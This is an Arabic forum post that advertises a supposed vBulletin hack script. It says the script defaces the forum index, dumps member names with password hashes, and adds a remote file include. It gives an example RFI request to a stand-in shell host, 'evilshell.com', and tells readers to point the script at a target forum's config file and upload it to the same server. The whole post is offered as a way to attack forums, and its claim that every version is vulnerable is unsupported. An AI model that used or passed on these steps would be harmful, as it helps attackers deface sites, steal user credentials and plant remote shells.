السكربت السحري للمنتديات

اليوم جبت لكم ثغرة طازجة للمنتديات من نوع vBulletin التي تستخدمها اغلب المواقع
والثغرة من اكتشاف الهاكر العربي المعروف rUn vIrUs
معلومات الثغرة:
البرنامج المصاب : vBulletin
النسخة المصابة : جميع النسخ
الخطر : عالية الخطورة
وظائف الثغرة:
1- تعديل الاندكس للمنتدى الى صفحة الإختراق. (لاصحاب الشهرة)
2- عرض اسماء الاعضاء مع الباسووردتا المشفرة. (للمحللين)
3- عمل ثغرة ريموت فايل انكلود للمنتدى. (الأفضل للشلات)
مثل
كود PHP:
index.php?cmd=http://evilshell.com

الشرح:
تعدل في ملف الثغرة في السطر التالي وتكتب مسار المنتدى المراد اختراقة:
كود PHP:
require("/home/site/public_html/vb/includes/config.php")

تبحث عن:
كود PHP:
by Nazy L!unx

وتعدله إلى اسمك أو اي شيء لإبراز الإختراق! (لا تعدله خليه على كذا ^_^)
لكي تخترق اي منتدى يجب ان ترفع ملف الثغرة على اي موقع على نفس السيرفر
ولازم يكون open_basedir مسموح على السيرفر